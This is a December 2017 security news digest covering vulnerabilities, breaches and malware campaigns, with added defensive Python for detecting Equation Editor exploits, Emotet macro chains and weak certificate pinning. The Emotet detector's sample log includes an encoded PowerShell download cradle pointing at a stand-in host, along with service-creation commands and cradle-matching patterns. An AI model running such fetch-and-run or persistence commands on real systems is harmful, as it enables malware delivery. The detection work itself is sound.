Latest cyber threats, vulnerabilities, data breaches and security updates
Tuesday December 12, 2017:
Keyless lock vulnerabilities
Researchers at Dell SecureWorks have discovered a vulnerability in two keyless entry products that could allow an attacker on the local network to unlock doors by sending unauthenticated commands to the door controllers over their serial-over-TCP/IP interface. The devices must be running in their default configuration for the attack to work.

The affected models are the AMAG Technology Symmetry Door Edge Network Controllers EN-1DBC and EN-2DBC, Threatpost reports.

MoneyTaker hacking group
A new hacking group dubbed MoneyTaker has allegedly stolen millions of dollars from banks in the US, UK and Russia over the past year, according to researchers. The group has targeted 20 organisations in all, including financial institutions, banks, software companies and law firms worldwide. MoneyTaker primarily goes after payment infrastructure, including card processing systems, SWIFT and the Russian Interbank System, in order to conduct fraudulent transactions, and cashes out through money mules. It also steals valuable and sensitive corporate information from its victims, ZDNet reports.

Microsoft Office vulnerability exploited in wild
Palo Alto Networks' Unit 42 researchers have spotted multiple instances of in-the-wild traffic from attackers exploiting a Microsoft Office vulnerability (CVE-2017-11882) that Microsoft patched last month as part of its monthly security updates.

According to the researchers, an exploit module for this vulnerability has already been released for Metasploit. The bug is a stack buffer overflow in the Microsoft Equation Editor component (EQNEDT32.EXE) that can lead to remote code execution when a victim opens a crafted document. Several security researchers have published write-ups on how to exploit it, and Unit 42's report provides an analysis of the threat along with an exploit proof-of-concept. If you haven't already, apply last month's Office updates to mitigate the threat.
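As an added triage example (not Unit 42's code), the Python below flags documents that embed a Microsoft Equation Editor object, the component CVE-2017-11882 lives in. It looks for the Equation.3 class ID {0002CE02-0000-0000-C000-000000000046} and the "Equation Native" stream name, both in raw OLE files and inside the hex blobs of RTF \objdata groups. A hit means the file deserves a closer look in a sandbox, not that it is malicious, since legitimate documents embed equations too. The sample RTF and the bare OLE header are constructed inputs and contain no exploit content.

```python
import re

# CLSID {0002CE02-0000-0000-C000-000000000046} (Equation.3) as OLE stores it:
# the first three GUID fields little-endian, the last eight bytes as-is.
EQUATION3_CLSID = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")
# OLE directory entries hold stream names as UTF-16LE.
EQUATION_NATIVE = "Equation Native".encode("utf-16-le")

RTF_MAGIC = b"{\\rtf"
OBJCLASS_RE = re.compile(rb"\\objclass\s*Equation\.3\b")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def rtf_objdata_blobs(data: bytes):
    """Decode every \\objdata hex blob in an RTF file to raw bytes."""
    for m in OBJDATA_RE.finditer(data):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        hexstr = hexstr[: len(hexstr) & ~1]  # drop a dangling nibble
        try:
            yield bytes.fromhex(hexstr.decode("ascii"))
        except ValueError:
            continue


def equation_indicators(data: bytes) -> dict:
    """Report which Equation Editor indicators are present in the file bytes."""
    is_rtf = data.startswith(RTF_MAGIC)
    # RTF embeds objects as hex text; anything else is searched as raw bytes.
    blobs = list(rtf_objdata_blobs(data)) if is_rtf else [data]
    return {
        "rtf": is_rtf,
        "objclass_equation3": is_rtf and bool(OBJCLASS_RE.search(data)),
        "clsid_equation3": any(EQUATION3_CLSID in b for b in blobs),
        "equation_native_stream": any(EQUATION_NATIVE in b for b in blobs),
    }


def is_suspect(data: bytes) -> bool:
    """True when any Equation Editor indicator is present."""
    ind = equation_indicators(data)
    return bool(ind["objclass_equation3"] or ind["clsid_equation3"]
                or ind["equation_native_stream"])


# Constructed samples: an RTF whose object data carries an OLE1 header
# (version 01050000, format 02000000, class name "Equation.3"), the
# Equation.3 CLSID and the stream name; and a bare OLE header with nothing
# embedded. Neither contains exploit content.
SAMPLE_RTF = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
    b"01050000020000000b0000004571756174696f6e2e330000"
    + EQUATION3_CLSID.hex().encode() + b"\n" + EQUATION_NATIVE.hex().encode()
    + b"}}}"
)
BENIGN_OLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64

if __name__ == "__main__":
    for name, sample in (("sample.rtf", SAMPLE_RTF), ("benign.doc", BENIGN_OLE)):
        verdict = "SUSPECT" if is_suspect(sample) else "clean"
        print(name, verdict, equation_indicators(sample))
```

Feed it the raw bytes of attachments pulled from mail or proxy logs; for OLE (.doc) files the CLSID sits in the directory entry of the embedded object's storage, so a plain byte search is enough, while RTF has to be hex-decoded first.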
 
Monday December 11, 2017:
Keylogger found in Synaptics driver on HP laptops
Security researcher Michael Myng has discovered that a Synaptics touchpad driver shipped on hundreds of HP laptop models contains debugging code that could be abused to log keystrokes. HP has released patches for most of the affected devices, and notes that an adversary would need full administrative privileges to take advantage of the issue.

The vulnerability in the Synaptics touchpad driver (SynTP.sys) also affects all Synaptics OEM partners. An attacker with administrative access (or an administrator) can simply enable the driver's debug trace by changing a registry value, after which keystrokes are written to a local file, SecurityWeek reports.

Emotet downloader trojan
McAfee has observed an increase in activity from a Trojan downloader dubbed "Emotet" that spreads via email and tricks victims into downloading a number of malicious payloads, including ransomware, Dridex, Trickbot, Pinkslipbot and other banking Trojans. According to the McAfee report, the phishing emails carry Word documents whose macros download the payloads. The macro code uses a combination of command-line tools, WMIC and PowerShell to copy code to disk and to create a service, which then contacts the control server to obtain a download URL.

McAfee also spotted a wave of new attacks in early December that was part of a campaign spreading the HydraCrypt ransomware family; samples from that campaign share characteristics with those used by the Emotet attackers. McAfee further warned that Emotet collects information about the victim's computer (such as running processes) and sends it, encrypted, to the control server in an HTTP POST request.
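The delivery chain described above (Word macro, then cmd/WMIC/PowerShell, then a service) is visible in process-creation telemetry. The Python below is an added example, not McAfee's code: it walks a process tree and flags Office descendants that spawn command-line tools, command lines carrying an encoded PowerShell script (decoded and checked for a download cradle), and service creation from under an Office process. The events are constructed sample records in a simplified Sysmon event 1 / Security 4688 shape; the field layout, process IDs and the c2.example URL are assumptions.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"cmd.exe", "wmic.exe", "powershell.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SERVICE_RE = re.compile(r"\b(?:sc(?:\.exe)?\s+create|New-Service)\b", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)


def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log: (pid, ppid, image, command line). Assumption: a
# simplified process-creation record (Sysmon event 1 / Security 4688 style).
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/get')"
PS_CMD = f"powershell -nop -w hidden -enc {encode_ps(STAGE2)}"
EVENTS = [
    (4201, 1, "explorer.exe", "explorer.exe"),
    (4310, 4201, "winword.exe", r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n invoice.doc'),
    (4322, 4310, "cmd.exe", f'cmd /c wmic process call create "{PS_CMD}"'),
    (4330, 4322, "wmic.exe", f'wmic process call create "{PS_CMD}"'),
    (4335, 4330, "powershell.exe", PS_CMD),
    (4340, 4335, "cmd.exe", r'cmd /c sc create WinNetSvc binPath= "C:\Users\Public\svc.exe" start= auto'),
    (5000, 4201, "chrome.exe", r'"C:\Program Files\Google\Chrome\chrome.exe" --type=renderer'),
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_tree(events):
    """pid -> (ppid, lower-cased image, command line)."""
    return {pid: (ppid, image.lower(), cmd) for pid, ppid, image, cmd in events}


def ancestor_images(tree, pid):
    """Images of every ancestor of pid, nearest first (cycle-safe)."""
    out, seen = [], set()
    ppid = tree[pid][0]
    while ppid in tree and ppid not in seen:
        seen.add(ppid)
        out.append(tree[ppid][1])
        ppid = tree[ppid][0]
    return out


def detect(events):
    """Return (pid, rule) findings for the Emotet-style macro chain."""
    tree = build_tree(events)
    findings = []
    for pid, (_ppid, image, cmd) in tree.items():
        under_office = any(a in OFFICE_APPS for a in ancestor_images(tree, pid))
        if under_office and image in LOLBINS:
            findings.append((pid, "office_spawns_lolbin"))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append((pid, "encoded_powershell"))
            if CRADLE_RE.search(decoded):
                findings.append((pid, "download_cradle"))
        if under_office and SERVICE_RE.search(cmd):
            findings.append((pid, "service_creation_from_office"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

The ancestor walk matters because WMIC breaks the direct parent link: the PowerShell process is a child of wmic.exe, not of winword.exe, so a rule that only checks the immediate parent misses it.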

File with 1.4B leaked passwords
Security researchers at 4iQ have discovered a large cache of 1.4 billion username and password combinations stored in a single file found on the dark web. Many of the credentials are stored in clear text, and the file is most likely an aggregation of multiple earlier incidents and leaked password dumps. Screenshots published by 4iQ show, among others, entries from Netflix, LinkedIn, MySpace, the dating site Zoosk, the adult website YouPorn, and the games Minecraft and RuneScape, according to the Fortune report.

 
Friday December 8, 2017:
Microsoft Malware Protection Engine vulnerability
Microsoft has issued a security advisory for a remote code execution (RCE) vulnerability in the Microsoft Malware Protection Engine that affects multiple products, including Exchange Server, Security Essentials, Windows Defender and Forefront Endpoint Protection.

The RCE vulnerability (CVE-2017-11937) exists when the Microsoft Malware Protection Engine does not properly scan a specially crafted file, leading to memory corruption. An attacker could exploit this bug to execute arbitrary code in the security context of the LocalSystem account and take control of the system.

The update addresses the vulnerability by correcting the manner in which the Microsoft Malware Protection Engine scans specially crafted files. 

Mozilla Firefox security patch
Mozilla has fixed a critical security vulnerability in Firefox 57.0.2. A buffer overflow occurs when drawing and validating elements using Direct3D 9 with the ANGLE graphics library, which is used for WebGL content (CVE-2017-7845). The bug affects only Windows systems.

MITM attacks on banking apps
Researchers from the University of Birmingham have discovered that certain iOS and Android banking apps, including HSBC's, as well as the TunnelBear VPN app, are vulnerable to man-in-the-middle (MITM) attacks, which an attacker could use to steal customer credentials or manipulate network traffic.

According to the Threatpost report, the researchers traced the vulnerability to how the apps implement certificate pinning and verify certificates when establishing a Transport Layer Security (TLS) connection. In their words, "certificate pinning can (and often does) hide the lack of proper hostname verification, enabling MITM attacks." Each of the affected banks was notified of the flaws, and the vulnerabilities have been fixed.
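To make the researchers' point concrete, here is an added Python example (not the researchers' tool or any bank's app code) of a pinning check that validates only the pin, beside one that also verifies the hostname. Certificates are modelled as plain dicts with constructed SAN lists and placeholder public-key bytes so the logic runs offline; a real implementation would pin the SHA-256 of the DER-encoded SubjectPublicKeyInfo and run after the TLS library's normal chain validation. The chain, names and key bytes are all assumptions.

```python
import hashlib


def spki_pin(spki_der: bytes) -> str:
    """Pin = SHA-256 of the certificate's SubjectPublicKeyInfo (hex here)."""
    return hashlib.sha256(spki_der).hexdigest()


def hostname_matches(pattern: str, hostname: str) -> bool:
    """RFC 6125-style match: exact, or one leftmost wildcard label that
    covers exactly one label and is not directly under a top-level domain."""
    p = pattern.lower().rstrip(".").split(".")
    h = hostname.lower().rstrip(".").split(".")
    if len(p) != len(h) or "" in h:
        return False
    if p[0] == "*":
        return len(p) >= 3 and p[1:] == h[1:]
    return p == h


# Constructed test data: placeholder key bytes stand in for DER SPKI blobs.
CA_SPKI = b"constructed-intermediate-ca-key"
INTERMEDIATE = {"sans": [], "spki": CA_SPKI}
BANK_LEAF = {"sans": ["online.bank.example", "*.bank.example"], "spki": b"bank-key"}
# Issued by the same CA, but for a different name: what a MITM would present.
ATTACKER_LEAF = {"sans": ["evil.example"], "spki": b"attacker-key"}
BANK_CHAIN = [BANK_LEAF, INTERMEDIATE]
ATTACKER_CHAIN = [ATTACKER_LEAF, INTERMEDIATE]
PINS = {spki_pin(CA_SPKI)}  # the app pins the CA key, a common choice


def chain_has_pin(chain, pins) -> bool:
    """True if any certificate in the presented chain matches a pin."""
    return any(spki_pin(c["spki"]) in pins for c in chain)


def verify_pin_only(chain, pins, hostname):
    """Vulnerable pattern: the pin matches, so the connection is trusted.
    'hostname' is accepted but never checked, so any certificate issued by
    the pinned CA, for any name, passes."""
    return chain_has_pin(chain, pins)


def verify_pin_and_hostname(chain, pins, hostname):
    """Hardened: the pin must match AND the leaf must be valid for the
    hostname. Assumes the TLS library already validated signatures and expiry."""
    if not chain_has_pin(chain, pins):
        return False
    leaf = chain[0]
    return any(hostname_matches(san, hostname) for san in leaf["sans"])


if __name__ == "__main__":
    for label, chain in (("bank", BANK_CHAIN), ("attacker", ATTACKER_CHAIN)):
        print(label, "pin-only:", verify_pin_only(chain, PINS, "online.bank.example"),
              "pin+hostname:", verify_pin_and_hostname(chain, PINS, "online.bank.example"))
```

The failure mode is exactly the one the quote describes: the attacker's chain is trusted by the pin-only check because the pinned CA key appears in it, and nothing ever compares the leaf's names to the host the app intended to reach. Pinning the leaf key instead of the CA key narrows the hole but does not replace hostname verification.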

Orcus malware targets Bitcoin investors
Fortinet has spotted a new phishing campaign targeting bitcoin investors amid the cryptocurrency trading frenzy. The lure is what purports to be the Gunbot bitcoin trading bot application, which actually delivers the Orcus RAT and is used to steal victims' investments.
 
Thursday December 7, 2017:
Apple Security Updates
Apple released security updates for iOS, macOS and other products. The iOS 11.2 update fixes 14 vulnerabilities, including flaws in IOKit, IOMobileFrameBuffer, IOSurface, Kernel, Mail and Wi-Fi. The Wi-Fi fix addresses the previously disclosed bug CVE-2017-13080, which could allow an attacker within Wi-Fi range to force nonce reuse in WPA multicast/GTK clients (the Key Reinstallation Attacks, or "KRACK").

Shortly after the iOS 11.2 release, however, some users reported problems following the upgrade, including reduced battery life and crashing apps, according to a Forbes report.

Apple fixed 22 vulnerabilities in all as part of the macOS and OS X security updates. Users are encouraged to upgrade Apple products to address vulnerabilities that could be exploited by attackers. 

Google Pixel / Nexus Security Bulletin
Google released the Pixel / Nexus Security Bulletin that contains details of security vulnerabilities and various functional improvements affecting supported Google Pixel and Nexus devices (Google devices). This security update includes vulnerabilities previously included in the December 2017 Android Security bulletin and additional patches that affect Google devices. 

For Google devices, security patch levels of 2017-12-05 or later address all issues in the bulletin. 

Google Chrome Security Update
Google has released Chrome version 63.0.3239.84 for Windows, Mac and Linux as part of the Chrome Stable Channel update for desktop. Chrome 63 includes 37 security fixes, 19 of which were reported by external researchers: 1 critical, 6 high, 7 medium and 5 low severity.

NiceHash security breach
NiceHash, a Bitcoin mining marketplace and exchange, reported that it was the victim of a security breach and planned to suspend operations for 24 hours. The attacker may have made off with more than $63M worth of Bitcoin.

As the company wrote on Wednesday, "our payment system was compromised and the contents of the NiceHash Bitcoin wallet have been stolen. We are working to verify the precise number of BTC taken." NiceHash is urgently working with law enforcement and appropriate authorities to investigate the breach. The company is also recommending users change their online passwords.